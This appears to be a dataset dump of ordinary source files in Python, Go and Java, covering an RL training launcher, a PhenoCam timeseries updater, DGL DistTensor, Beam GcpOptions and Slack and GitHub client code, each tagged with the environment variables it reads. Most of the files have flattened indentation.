common.log('Skipped Catcher: ' + catcherName)
continue
dataImp = fu.getFileContent(pathImp)
                for i, p in enumerate(ps):
                    dataImp = dataImp.replace('@PARAM' + str(i+1) + '@', p.strip())
dataImp = dataImp.replace('\r\n','\n')
dataImp += "\nitem_info_name=type\nitem_info_build=video\nitem_url_build=%s"
data = data.replace(idat, dataImp)
return data
def __replaceSimpleVars(self, data):
for s in self.simpleScheme:
m_reg = findall(data, s)
value = self.simpleScheme.get(s)
for idat in m_reg:
data = data.replace(idat, value)
return data
def __replaceConditions(self, data):
starts = [match.start() for match in re.finditer(re.escape('@IF('), data)]
for j in range(len(starts)-1,-1,-1):
s = starts[j]
p_reg = re.compile('((@IF\((.+?)\)@).*?(@ENDIF@))', re.IGNORECASE + re.DOTALL + re.MULTILINE)
m_reg = p_reg.findall(data[s:])
if len(m_reg) > 0:
for m in m_reg:
new_reg=p_reg.match(m[0])
condStr = new_reg.group(3)
hidePassage=False
if condStr.find('==') != -1:
condArr=condStr.split('==')
hidePassage = condArr[0].strip().lower() != condArr[1].strip().lower()
elif condStr.find('!=') != -1:
condArr=condStr.split('!=')
hidePassage = condArr[0].strip().lower() == condArr[1].strip().lower()
if hidePassage:
data = data.replace(str(new_reg.group(1)),'')
else:
tmpdata = str(new_reg.group(1))
tmpdata = tmpdata.replace(str(new_reg.group(2)),'',1)
tmpdata = tmpdata[:-len(str(new_reg.group(4)))]
data = data.replace(str(new_reg.group(1)),tmpdata)
return data
def replace(self, pathToImports, data, lItem, params=[]):
data = self.__replaceParameters(data, params)
data = self.__replaceConditions(data)
data = self.__replaceImports(pathToImports, data)
data = self.__replaceParameters(data, params)
data = self.__replaceFinders(data)
data = self.__replaceCatchers(data)
data = self.__replaceSimpleVars(data)
data = self.__replaceConditions(data)
return data
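# Illustrative usage sketch (hypothetical snippet and parameters, not part of
# the add-on): replace() expands @PARAMn@ first, then conditions, imports,
# finders, catchers and finally the simple variables such as @LANGUAGE@.
#   cr = CustomReplacements()
#   text = "lang=@LANGUAGE@\n@IF(@PARAM1@ == hd)@quality=high\n@ENDIF@"
#   expanded = cr.replace(common.Paths.modulesDir, text, None, params=['hd'])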
| []
| []
| [
"OS"
]
| [] | ["OS"] | python | 1 | 0 | |
train/myppo/train_ppo.py | import copy
import glob
import os
import sys
import time
from collections import deque
import random
from functools import partial
import gym
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.distributed import rpc
import torch.multiprocessing as mp
import sumolib
from .a2c_ppo_acktr.arguments import get_args
from .a2c_ppo_acktr.envs import make_vec_envs
from .a2c_ppo_acktr.model import Policy
from .a2c_ppo_acktr.storage import RolloutStorage
from .a2c_ppo_acktr.trainer import Trainer
from .evaluation import evaluate
def train(rank, args, flow_params=None):
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = str(args.master_port)
if rank == 0:
rpc_opt = rpc.TensorPipeRpcBackendOptions(num_worker_threads=\
max(16, args.num_splits * args.num_actors), rpc_timeout=500)
rpc.init_rpc('agent', rank=rank, world_size=args.num_actors + 1, rpc_backend_options=rpc_opt)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
random.seed(args.seed)
if args.cuda and torch.cuda.is_available() and args.cuda_deterministic:
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
# envs = make_vec_envs(args.env_name, args.seed, 1, \
# args.gamma, save_path, device, False, \
# port=args.port, popart_reward=args.popart_reward, \
# flow_params=flow_params, reward_scale=args.reward_scale, \
# verbose=args.verbose)
trainer = Trainer(args, flow_params)
trainer.run()
else:
rpc_opt = rpc.TensorPipeRpcBackendOptions(rpc_timeout=500)
rpc.init_rpc('actor_' + str(rank - 1), rank=rank, world_size=args.num_actors + 1, rpc_backend_options=rpc_opt)
rpc.shutdown()
def train_ppo(flow_params=None):
mp.set_start_method('spawn')
args = get_args(sys.argv[2:])
args.master_port = sumolib.miscutils.getFreeSocketPort()
procs = []
for i in range(args.num_actors + 1):
p = mp.Process(target=train, args=(i, args, flow_params))
p.start()
procs.append(p)
for p in procs:
p.join()
if __name__ == "__main__":
train_ppo()
| []
| []
| [
"MASTER_ADDR",
"MASTER_PORT"
]
| [] | ["MASTER_ADDR", "MASTER_PORT"] | python | 2 | 0 | |
src/vegindex/update_roi_ir_timeseries.py | #!/usr/bin/env python
"""
Update an ROI IR timeseries CSV file.
"""
from __future__ import absolute_import
from __future__ import print_function
import argparse
import os
import sys
from datetime import timedelta
# try python3 import then python2 import
try:
from configparser import ConfigParser as configparser
except ImportError:
from ConfigParser import SafeConfigParser as configparser
# use this because numpy/openblas is automatically multi-threaded.
os.environ["OMP_NUM_THREADS"] = "1"
os.environ["MKL_NUM_THREADS"] = "1"
import numpy as np
from PIL import Image
import vegindex as vi
from vegindex.ir_roitimeseries import IRROITimeSeries
from vegindex.vegindex import get_roi_list
from . import utils
# use this because numpy/openblas is automatically multi-threaded.
os.environ["OMP_NUM_THREADS"] = "1"
# set vars
# you can set the archive directory to somewhere else for testing by
# using the env variable, PHENOCAM_ARCHIVE_DIR.
archive_dir = vi.config.archive_dir
debug = False
default_resize = vi.config.RESIZE
# if __name__ == "__main__":
def main():
# set up command line argument processing
parser = argparse.ArgumentParser()
# options
parser.add_argument(
"-v",
"--verbose",
help="increase output verbosity",
action="store_true",
default=False,
)
parser.add_argument(
"-n",
"--dry-run",
help="Process data but don't save results",
action="store_true",
default=False,
)
# positional arguments
parser.add_argument("site", help="PhenoCam site name")
parser.add_argument("roiname", help="ROI name, e.g. canopy_0001")
# get args
args = parser.parse_args()
sitename = args.site
roiname = args.roiname
verbose = args.verbose
dryrun = args.dry_run
if verbose:
print("site: {0}".format(sitename))
print("roiname: {0}".format(roiname))
print("verbose: {0}".format(verbose))
print("dryrun: {0}".format(dryrun))
# set input/output filename
inname = "%s_%s_IR_roistats.csv" % (sitename, roiname)
outname = inname
inpath = os.path.join(archive_dir, sitename, "ROI", outname)
outpath = inpath
if verbose:
print("output file: {0}".format(outname))
# get ROI list
roi_list = get_roi_list(sitename, roiname)
# read existing CSV file - since this is an update throw
# exception if the file doesn't already exist
try:
roits = IRROITimeSeries(site=sitename, ROIListID=roiname)
roits.readCSV(inpath)
except IOError:
errmsg = "Unable to read IR CSV file: {0}\n".format(outpath)
sys.stderr.write(errmsg)
sys.exit(1)
# read in config file for this site if it exists
config_file = "{0}_{1}.cfg".format(sitename, roiname)
config_path = os.path.join(archive_dir, sitename, "ROI", config_file)
if os.path.exists(config_path):
cfgparser = configparser(defaults={"resize": str(default_resize)})
cfgparser.read(config_path)
if cfgparser.has_section("roi_timeseries"):
resizeFlg = cfgparser.getboolean("roi_timeseries", "resize")
else:
resizeFlg = default_resize
# verify that config matches CSV header!
if resizeFlg != roits.resizeFlg:
errmsg = "resize flag from config doesn't match CSV header\n"
sys.stderr.write(errmsg)
sys.exit(1)
else:
resizeFlg = default_resize
# print config values
if verbose:
print("")
print("ROI timeseries config:")
print("======================")
print("roi_list: ", "{0}_{1}_roi.csv".format(sitename, roiname))
if os.path.exists(config_path):
print("config file: {0}".format(config_file))
else:
print("config file: None")
print("Resize Flag: ", resizeFlg)
# get list of images already in CSV
old_imglist = roits.get_image_list()
# find last dt in current timeseries CSV
nlast = len(roits.rows) - 1
dt_last = roits.rows[nlast]["datetime"]
# add five seconds so that we don't reprocess last image
dt_last = dt_last + timedelta(seconds=5)
# start with images newer than last dt
dt_start = dt_last
if verbose:
print("last image at: {0}".format(dt_last))
# loop over mask entries in ROI list
nimage = 0
nupdate = 0
for imask, roimask in enumerate(roi_list.masks):
roi_startDT = roimask["start_dt"]
roi_endDT = roimask["end_dt"]
        # skip this ROI maskfile if its validity interval ends
# before last date before update
if roi_endDT < dt_start:
continue
# start_date = roi_startDT.date()
# end_date = roi_endDT.date()
# start_time = roi_startDT.time()
# end_time = roi_endDT.time()
maskfile = roimask["maskfile"]
# okay set the start datetime to the larger of dt_start (from
# last row of existing timeseries CSV) and the beginning of
# the ROI validity. We need to do this for the case where
# there is a gap between last row of CSV and beginning of next
# validity interval. This will often be the case when there
# are a series of "transitional images" between two
# stable/useful camera positions.
if dt_start < roi_startDT:
dt_start = roi_startDT
mask_path = os.path.join(archive_dir, sitename, "ROI", maskfile)
# print roi_path
try:
mask_img = Image.open(mask_path)
except Exception:
sys.stderr.write("Unable to open ROI mask file\n")
sys.exit(1)
# check that mask_img is in expected form
mask_mode = mask_img.mode
if mask_mode != "L":
# convert to 8-bit mask
mask_img = mask_img.convert("L")
# make a numpy mask
roimask = np.asarray(mask_img, dtype=np.bool8)
# get list of images for this timeperiod
imglist = utils.getsiteimglist(
sitename, getIR=True, startDT=dt_start, endDT=roi_endDT
)
nimage += len(imglist)
for impath in imglist:
if debug:
print(maskfile, impath)
# check if image already exists in list -- just to be
# sure!
fn = os.path.basename(impath)
try:
row_index = old_imglist.index(fn)
except Exception:
row_index = None
# append/insert row for this image/mask - shouldn't happen
# but just to be on safe side!
            if row_index is not None:
roits_row = roits.insert_row(impath, roimask, imask + 1)
else:
roits_row = roits.append_row(impath, roimask, imask + 1)
# check that we could append/insert a row
if roits_row:
nupdate += 1
else:
continue
if verbose:
csvstr = roits.format_csvrow(roits_row)
print(csvstr)
if debug:
if nupdate == 10:
break
# output CSV file
if dryrun:
nout = 0
else:
nout = roits.writeCSV(outpath)
print("Images processed: %d" % (nimage,))
print("Images added to CSV: %d" % (nupdate,))
print("Total: %d" % (nout,))
| []
| []
| [
"MKL_NUM_THREADS",
"OMP_NUM_THREADS"
]
| [] | ["MKL_NUM_THREADS", "OMP_NUM_THREADS"] | python | 2 | 0 | |
main.go | package main
import (
"context"
"fmt"
"log"
"os"
"runtime/debug"
"time"
"github.com/digineo/cambium-exporter/auth"
"github.com/digineo/cambium-exporter/exporter"
kingpin "gopkg.in/alecthomas/kingpin.v2"
)
// DefaultConfigPath points to the default config file location.
// This might be overwritten at build time (using -ldflags).
var DefaultConfigPath = "./config.toml"
// nolint: gochecknoglobals
var (
version = "dev"
commit = ""
date = ""
)
func main() {
log.SetFlags(log.Lshortfile)
listenAddress := kingpin.Flag("web.listen-address", "Address on which to expose metrics and web interface.").Default(":9836").String()
configFile := kingpin.Flag("config", "Path to configuration file.").Default(DefaultConfigPath).String()
performLogin := kingpin.Flag("login", "Perform login test, and dump session cookie.").Bool()
verbose := kingpin.Flag("verbose", "Increase log verbosity.").Short('V').Bool()
versionFlag := kingpin.Flag("version", "Print version information and exit.").Short('v').Bool()
kingpin.HelpFlag.Short('h')
kingpin.Parse()
if *versionFlag {
printVersion()
os.Exit(0)
}
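	// Optional environment overrides for the browser used during login:
	// HEADLESS=0 disables headless mode, CHROME_BINARY selects a custom Chrome executable.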
if headless := os.Getenv("HEADLESS"); headless == "0" {
auth.SetHeadless(false)
}
if binary := os.Getenv("CHROME_BINARY"); binary != "" {
auth.SetExecPath(binary)
}
client, err := exporter.LoadClientConfig(*configFile, *verbose)
if err != nil {
log.Fatal(err.Error())
}
if *performLogin {
ctx, cancel := context.WithTimeout(context.Background(), 20*time.Second)
defer cancel()
info, err := auth.Login(ctx, client.Instance, client.Username, client.Password)
if err != nil {
log.Fatalf("login failed: %v", err)
return
}
log.Printf("login succeeded: %+v", info)
return
}
log.Fatal(client.Start(*listenAddress, version))
}
func printVersion() {
info, ok := debug.ReadBuildInfo()
if !ok {
return
}
const l = "%-10s %-50s %s\n"
fmt.Println("Dependencies\n------------")
fmt.Printf(l, "main", info.Main.Path, version)
for _, i := range info.Deps {
if r := i.Replace; r != nil {
fmt.Printf(l, "dep", r.Path, r.Version)
fmt.Printf(l, " replaces", i.Path, i.Version)
} else {
fmt.Printf(l, "dep", i.Path, i.Version)
}
}
}
| [
"\"HEADLESS\"",
"\"CHROME_BINARY\""
]
| []
| [
"HEADLESS",
"CHROME_BINARY"
]
| [] | ["HEADLESS", "CHROME_BINARY"] | go | 2 | 0 | |
python/dgl/distributed/dist_tensor.py | """Define distributed tensor."""
import os
from .dist_context import is_initialized
from .kvstore import get_kvstore
from .role import get_role
from .. import utils
from .. import backend as F
def _default_init_data(shape, dtype):
return F.zeros(shape, dtype, F.cpu())
# These IDs can identify the anonymous distributed tensors.
DIST_TENSOR_ID = 0
class DistTensor:
''' Distributed tensor.
``DistTensor`` references to a distributed tensor sharded and stored in a cluster of machines.
It has the same interface as Pytorch Tensor to access its metadata (e.g., shape and data type).
To access data in a distributed tensor, it supports slicing rows and writing data to rows.
It does not support any operators of a deep learning framework, such as addition and
multiplication.
Currently, distributed tensors are designed to store node data and edge data of a distributed
graph. Therefore, their first dimensions have to be the number of nodes or edges in the graph.
The tensors are sharded in the first dimension based on the partition policy of nodes
or edges. When a distributed tensor is created, the partition policy is automatically
determined based on the first dimension if the partition policy is not provided. If the first
dimension matches the number of nodes of a node type, ``DistTensor`` will use the partition
policy for this particular node type; if the first dimension matches the number of edges of
an edge type, ``DistTensor`` will use the partition policy for this particular edge type.
If DGL cannot determine the partition policy automatically (e.g., multiple node types or
    edge types have the same number of nodes or edges), users have to explicitly provide
the partition policy.
    A distributed tensor can be either named or anonymous.
When a distributed tensor has a name, the tensor can be persistent if ``persistent=True``.
Normally, DGL destroys the distributed tensor in the system when the ``DistTensor`` object
goes away. However, a persistent tensor lives in the system even if
    the ``DistTensor`` object disappears in the trainer process. The persistent tensor has
the same life span as the DGL servers. DGL does not allow an anonymous tensor to be persistent.
    When a ``DistTensor`` object is created, it may reference an existing distributed tensor or
create a new one. A distributed tensor is identified by the name passed to the constructor.
If the name exists, ``DistTensor`` will reference the existing one.
In this case, the shape and the data type must match the existing tensor.
If the name doesn't exist, a new tensor will be created in the kvstore.
When a distributed tensor is created, its values are initialized to zero. Users
can define an initialization function to control how the values are initialized.
The init function has two input arguments: shape and data type and returns a tensor.
Below shows an example of an init function:
.. highlight:: python
.. code-block:: python
def init_func(shape, dtype):
return torch.ones(shape=shape, dtype=dtype)
Parameters
----------
shape : tuple
The shape of the tensor. The first dimension has to be the number of nodes or
the number of edges of a distributed graph.
dtype : dtype
The dtype of the tensor. The data type has to be the one in the deep learning framework.
name : string, optional
The name of the embeddings. The name can uniquely identify embeddings in a system
        so that another ``DistTensor`` object can refer to the distributed tensor.
init_func : callable, optional
The function to initialize data in the tensor. If the init function is not provided,
the values of the embeddings are initialized to zero.
part_policy : PartitionPolicy, optional
The partition policy of the rows of the tensor to different machines in the cluster.
Currently, it only supports node partition policy or edge partition policy.
The system determines the right partition policy automatically.
persistent : bool
Whether the created tensor lives after the ``DistTensor`` object is destroyed.
is_gdata : bool
Whether the created tensor is a ndata/edata or not.
Examples
--------
>>> init = lambda shape, dtype: th.ones(shape, dtype=dtype)
>>> arr = dgl.distributed.DistTensor((g.number_of_nodes(), 2), th.int32, init_func=init)
>>> print(arr[0:3])
tensor([[1, 1],
[1, 1],
[1, 1]], dtype=torch.int32)
>>> arr[0:3] = th.ones((3, 2), dtype=th.int32) * 2
>>> print(arr[0:3])
tensor([[2, 2],
[2, 2],
[2, 2]], dtype=torch.int32)
Note
----
The creation of ``DistTensor`` is a synchronized operation. When a trainer process tries to
create a ``DistTensor`` object, the creation succeeds only when all trainer processes
do the same.
'''
def __init__(self, shape, dtype, name=None, init_func=None, part_policy=None,
persistent=False, is_gdata=True):
self.kvstore = get_kvstore()
assert self.kvstore is not None, \
'Distributed module is not initialized. Please call dgl.distributed.initialize.'
self._shape = shape
self._dtype = dtype
part_policies = self.kvstore.all_possible_part_policy
# If a user doesn't provide a partition policy, we should find one based on
# the input shape.
if part_policy is None:
for policy_name in part_policies:
policy = part_policies[policy_name]
if policy.get_size() == shape[0]:
# If multiple partition policies match the input shape, we cannot
# decide which is the right one automatically. We should ask users
# to provide one.
assert part_policy is None, \
'Multiple partition policies match the input shape. ' \
+ 'Please provide a partition policy explicitly.'
part_policy = policy
assert part_policy is not None, \
'Cannot find a right partition policy. It is either because ' \
+ 'its first dimension does not match the number of nodes or edges ' \
+ 'of a distributed graph or there does not exist a distributed graph.'
self._tensor_name = name
self._part_policy = part_policy
assert part_policy.get_size() == shape[0], \
'The partition policy does not match the input shape.'
if init_func is None:
init_func = _default_init_data
exist_names = self.kvstore.data_name_list()
# If a user doesn't provide a name, we generate a name ourselves.
# We need to generate the name in a deterministic way.
if name is None:
assert not persistent, 'We cannot generate anonymous persistent distributed tensors'
global DIST_TENSOR_ID
# All processes of the same role should create DistTensor synchronously.
# Thus, all of them should have the same IDs.
name = 'anonymous-' + get_role() + '-' + str(DIST_TENSOR_ID)
DIST_TENSOR_ID += 1
assert isinstance(name, str), 'name {} is type {}'.format(name, type(name))
data_name = part_policy.get_data_name(name)
self._name = str(data_name)
self._persistent = persistent
if self._name not in exist_names:
self.kvstore.init_data(self._name, shape, dtype, part_policy, init_func, is_gdata)
self._owner = True
else:
self._owner = False
dtype1, shape1, _ = self.kvstore.get_data_meta(self._name)
assert dtype == dtype1, 'The dtype does not match with the existing tensor'
assert shape == shape1, 'The shape does not match with the existing tensor'
def __del__(self):
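        # Only delete the backing kvstore data for non-persistent tensors created by this
        # object, and only while the distributed runtime (or standalone mode) is still up.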
initialized = os.environ.get('DGL_DIST_MODE', 'standalone') == 'standalone' \
or is_initialized()
if not self._persistent and self._owner and initialized:
self.kvstore.delete_data(self._name)
def __getitem__(self, idx):
idx = utils.toindex(idx)
idx = idx.tousertensor()
return self.kvstore.pull(name=self._name, id_tensor=idx)
def __setitem__(self, idx, val):
idx = utils.toindex(idx)
idx = idx.tousertensor()
# TODO(zhengda) how do we want to support broadcast (e.g., G.ndata['h'][idx] = 1).
self.kvstore.push(name=self._name, id_tensor=idx, data_tensor=val)
def __len__(self):
return self._shape[0]
@property
def part_policy(self):
'''Return the partition policy
Returns
-------
PartitionPolicy
The partition policy of the distributed tensor.
'''
return self._part_policy
@property
def shape(self):
'''Return the shape of the distributed tensor.
Returns
-------
tuple
The shape of the distributed tensor.
'''
return self._shape
@property
def dtype(self):
'''Return the data type of the distributed tensor.
Returns
        -------
dtype
The data type of the tensor.
'''
return self._dtype
@property
def name(self):
'''Return the name of the distributed tensor
Returns
-------
str
The name of the tensor.
'''
return self._name
@property
def tensor_name(self):
'''Return the tensor name
Returns
-------
str
The name of the tensor.
'''
return self._tensor_name
| []
| []
| [
"DGL_DIST_MODE"
]
| [] | ["DGL_DIST_MODE"] | python | 1 | 0 | |
sdks/java/core/src/main/java/org/apache/beam/sdk/options/GcpOptions.java | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.beam.sdk.options;
import com.fasterxml.jackson.annotation.JsonIgnore;
import com.google.auth.Credentials;
import com.google.common.annotations.VisibleForTesting;
import com.google.common.base.Strings;
import com.google.common.io.Files;
import java.io.File;
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.util.Locale;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import javax.annotation.Nullable;
import org.apache.beam.sdk.util.CredentialFactory;
import org.apache.beam.sdk.util.GcpCredentialFactory;
import org.apache.beam.sdk.util.InstanceBuilder;
import org.apache.beam.sdk.util.PathValidator;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
/**
* Options used to configure Google Cloud Platform specific options such as the project
* and credentials.
*
* <p>These options defer to the
* <a href="https://developers.google.com/accounts/docs/application-default-credentials">
* application default credentials</a> for authentication. See the
* <a href="https://github.com/google/google-auth-library-java">Google Auth Library</a> for
* alternative mechanisms for creating credentials.
*/
@Description("Options used to configure Google Cloud Platform project and credentials.")
public interface GcpOptions extends GoogleApiDebugOptions, PipelineOptions {
/**
* Project id to use when launching jobs.
*/
@Description("Project id. Required when running a Dataflow in the cloud. "
+ "See https://cloud.google.com/storage/docs/projects for further details.")
@Default.InstanceFactory(DefaultProjectFactory.class)
String getProject();
void setProject(String value);
/**
* The class of the credential factory that should be created and used to create
* credentials. If gcpCredential has not been set explicitly, an instance of this class will
* be constructed and used as a credential factory.
*/
@Description("The class of the credential factory that should be created and used to create "
+ "credentials. If gcpCredential has not been set explicitly, an instance of this class will "
+ "be constructed and used as a credential factory.")
@Default.Class(GcpCredentialFactory.class)
Class<? extends CredentialFactory> getCredentialFactoryClass();
void setCredentialFactoryClass(
Class<? extends CredentialFactory> credentialFactoryClass);
/**
* The credential instance that should be used to authenticate against GCP services.
* If no credential has been set explicitly, the default is to use the instance factory
* that constructs a credential based upon the currently set credentialFactoryClass.
*/
@JsonIgnore
@Description("The credential instance that should be used to authenticate against GCP services. "
+ "If no credential has been set explicitly, the default is to use the instance factory "
+ "that constructs a credential based upon the currently set credentialFactoryClass.")
@Default.InstanceFactory(GcpUserCredentialsFactory.class)
Credentials getGcpCredential();
void setGcpCredential(Credentials value);
/**
* Attempts to infer the default project based upon the environment this application
* is executing within. Currently this only supports getting the default project from gcloud.
*/
class DefaultProjectFactory implements DefaultValueFactory<String> {
private static final Logger LOG = LoggerFactory.getLogger(DefaultProjectFactory.class);
@Override
public String create(PipelineOptions options) {
try {
File configFile;
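        // Locate the gcloud configuration: prefer $CLOUDSDK_CONFIG, then %APPDATA% on
        // Windows, otherwise fall back to the default paths under the user's home directory.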
if (getEnvironment().containsKey("CLOUDSDK_CONFIG")) {
configFile = new File(getEnvironment().get("CLOUDSDK_CONFIG"), "properties");
} else if (isWindows() && getEnvironment().containsKey("APPDATA")) {
configFile = new File(getEnvironment().get("APPDATA"), "gcloud/properties");
} else {
// New versions of gcloud use this file
configFile = new File(
System.getProperty("user.home"),
".config/gcloud/configurations/config_default");
if (!configFile.exists()) {
// Old versions of gcloud use this file
configFile = new File(System.getProperty("user.home"), ".config/gcloud/properties");
}
}
String section = null;
Pattern projectPattern = Pattern.compile("^project\\s*=\\s*(.*)$");
Pattern sectionPattern = Pattern.compile("^\\[(.*)\\]$");
for (String line : Files.readLines(configFile, StandardCharsets.UTF_8)) {
line = line.trim();
if (line.isEmpty() || line.startsWith(";")) {
continue;
}
Matcher matcher = sectionPattern.matcher(line);
if (matcher.matches()) {
section = matcher.group(1);
} else if (section == null || section.equals("core")) {
matcher = projectPattern.matcher(line);
if (matcher.matches()) {
String project = matcher.group(1).trim();
LOG.info("Inferred default GCP project '{}' from gcloud. If this is the incorrect "
+ "project, please cancel this Pipeline and specify the command-line "
+ "argument --project.", project);
return project;
}
}
}
} catch (IOException expected) {
LOG.debug("Failed to find default project.", expected);
}
// return null if can't determine
return null;
}
/**
* Returns true if running on the Windows OS.
*/
private static boolean isWindows() {
return System.getProperty("os.name").toLowerCase(Locale.ENGLISH).contains("windows");
}
/**
* Used to mock out getting environment variables.
*/
@VisibleForTesting
Map<String, String> getEnvironment() {
return System.getenv();
}
}
/**
* Attempts to load the GCP credentials. See
* {@link CredentialFactory#getCredential()} for more details.
*/
class GcpUserCredentialsFactory implements DefaultValueFactory<Credentials> {
@Override
public Credentials create(PipelineOptions options) {
GcpOptions gcpOptions = options.as(GcpOptions.class);
try {
CredentialFactory factory = InstanceBuilder.ofType(CredentialFactory.class)
.fromClass(gcpOptions.getCredentialFactoryClass())
.fromFactoryMethod("fromOptions")
.withArg(PipelineOptions.class, options)
.build();
return factory.getCredential();
} catch (IOException | GeneralSecurityException e) {
throw new RuntimeException("Unable to obtain credential", e);
}
}
}
/**
* A GCS path for storing temporary files in GCP.
*
   * <p>It defaults to {@link PipelineOptions#getTempLocation}.
*/
@Description("A GCS path for storing temporary files in GCP.")
@Default.InstanceFactory(GcpTempLocationFactory.class)
@Nullable String getGcpTempLocation();
void setGcpTempLocation(String value);
/**
* Returns {@link PipelineOptions#getTempLocation} as the default GCP temp location.
*/
class GcpTempLocationFactory implements DefaultValueFactory<String> {
@Override
@Nullable
public String create(PipelineOptions options) {
String tempLocation = options.getTempLocation();
if (!Strings.isNullOrEmpty(tempLocation)) {
try {
PathValidator validator = options.as(GcsOptions.class).getPathValidator();
validator.validateOutputFilePrefixSupported(tempLocation);
} catch (Exception e) {
// Ignore the temp location because it is not a valid 'gs://' path.
return null;
}
}
return tempLocation;
}
}
}
| []
| []
| []
| [] | [] | java | 0 | 0 | |
vendor/github.com/lestrrat/go-slack/slack_example_test.go | package slack_test
import (
"context"
"crypto/rand"
"fmt"
"net/http"
"os"
"golang.org/x/oauth2"
slack "github.com/lestrrat/go-slack"
)
func ExampleClient() {
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
token := os.Getenv("SLACK_TOKEN")
cl := slack.New(token)
// check if we are connected
authres, err := cl.Auth().Test().Do(ctx)
if err != nil {
fmt.Printf("failed to test authentication: %s\n", err)
return
}
fmt.Printf("%#v\n", authres)
// simplest possible message
chatres, err := cl.Chat().PostMessage("@username").
Text("Hello, World!").
Do(ctx)
if err != nil {
fmt.Printf("failed to post messsage: %s\n", err)
return
}
fmt.Printf("%#v\n", chatres)
}
func ExampleOAuth2() {
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
// When you create a Slack App, you need to authorize your app through OAuth2
//
// If you installed your app via the Web UI, you should be able to see the
// tokens generated when you did so at https://api.slack.com/apps/XXXXXX/oauth
// where XXXXXX is a random ID generated for your app.
//
	// You could use these tokens, or you can do a manual OAuth2 flow, which is
	// shown in pseudo-working form below. (note: most of it is just straight oauth2
	// taken from https://godoc.org/golang.org/x/oauth2#example-Config)
// However, Slack does not allow offline flow, so you will need to actually
// run this in a webserver, unlike the example in the above URL.
conf := oauth2.Config{
ClientID: os.Getenv("SLACK_APP_CLIENT_ID"),
ClientSecret: os.Getenv("SLACK_APP_CLIENT_SECRET"),
RedirectURL: os.Getenv("SLACK_APP_REDIRECT_URL"),
Scopes: []string{
slack.ChatWriteBotScope,
},
Endpoint: slack.OAuth2Endpoint,
}
http.HandleFunc("/oauth/start", func(w http.ResponseWriter, r *http.Request) {
// Poor man's UUID
b := make([]byte, 16)
rand.Reader.Read(b)
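		// Set the version (4) and variant bits so the bytes form a valid UUIDv4.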
b[6] = (b[6] & 0x0F) | 0x40
b[8] = (b[8] &^ 0x40) | 0x80
state := fmt.Sprintf("%x-%x-%x-%x-%x", b[0:4], b[4:6], b[6:8], b[8:10], b[10:])
// TODO: Use session or whatever to save "state", so the user
// can be verified
// Redirect user to consent page to ask for permission
// for the scopes specified above.
url := conf.AuthCodeURL(state)
w.Header().Set("Location", url)
w.WriteHeader(http.StatusFound)
})
http.HandleFunc("/oauth/callback", func(w http.ResponseWriter, r *http.Request) {
code := r.FormValue("code")
// TODO: Use session or whatever to restore "state", so the user
// can be verified
tok, err := conf.Exchange(ctx, code)
if err != nil {
http.Error(w, "failed to exchange tokens", http.StatusInternalServerError)
return
}
// You could store tok.AccessToken for later use, or you can immediately
// start a client like this
cl := slack.New(tok.AccessToken)
if _, err := cl.Auth().Test().Do(ctx); err != nil {
http.Error(w, "failed to test auth", http.StatusInternalServerError)
return
}
w.Header().Set("Contenxt-Type", "text/plain")
w.WriteHeader(http.StatusOK)
w.Write([]byte("Successfully connected to Slack"))
})
http.ListenAndServe(":8080", nil)
}
| [
"\"SLACK_TOKEN\"",
"\"SLACK_APP_CLIENT_ID\"",
"\"SLACK_APP_CLIENT_SECRET\"",
"\"SLACK_APP_REDIRECT_URL\""
]
| []
| [
"SLACK_APP_CLIENT_SECRET",
"SLACK_APP_REDIRECT_URL",
"SLACK_TOKEN",
"SLACK_APP_CLIENT_ID"
]
| [] | ["SLACK_APP_CLIENT_SECRET", "SLACK_APP_REDIRECT_URL", "SLACK_TOKEN", "SLACK_APP_CLIENT_ID"] | go | 4 | 0 | |
pkg/app/app.go | package app
import (
"context"
"fmt"
"os"
"time"
"github.com/fatih/color"
"github.com/spf13/cobra"
"github.com/micnncim/repoconfig/pkg/github"
"github.com/micnncim/repoconfig/pkg/http"
"github.com/micnncim/repoconfig/pkg/logging"
"github.com/micnncim/repoconfig/pkg/spinner"
"github.com/micnncim/repoconfig/pkg/survey"
)
type app struct {
githubClient github.Client
spinner *spinner.Spinner
}
type repository struct {
owner, repo string
}
func NewCommand() (*cobra.Command, error) {
logger, err := logging.NewLogger(os.Stderr, logging.LevelInfo, logging.FormatColorConsole)
if err != nil {
return nil, err
}
logger = logger.Named("app")
httpClient, err := http.NewClient(
github.APIBaseURL,
http.WithLogger(logger),
)
if err != nil {
return nil, err
}
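	// Authenticate against the GitHub API with a personal access token taken from
	// the GITHUB_TOKEN environment variable.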
githubClient, err := github.NewClient(
os.Getenv("GITHUB_TOKEN"),
httpClient,
github.WithLogger(logger),
)
if err != nil {
return nil, err
}
app := &app{
githubClient: githubClient,
spinner: spinner.New(),
}
cmd := &cobra.Command{
Use: "repoconfig <OWNER> <REPO>",
Short: "CLI to update repository config",
RunE: app.run,
}
return cmd, nil
}
func (a *app) run(_ *cobra.Command, args []string) error {
if len(args) != 2 {
return fmt.Errorf("invalid arguments: %q", args)
}
owner, repo := args[0], args[1]
ctx, cancel := context.WithTimeout(context.Background(), 10*time.Minute)
defer cancel()
repository, err := a.getRepository(ctx, owner, repo)
if err != nil {
return err
}
input, err := askUpdateRepositoryInput(survey.NewSurveyor(), repository)
switch err {
case nil:
case ErrRepositoryNoChange:
warnf("\n🤖 %s/%s has not been changed\n", owner, repo)
return nil
default:
return err
}
if err := a.githubClient.UpdateRepository(ctx, owner, repo, input); err != nil {
return err
}
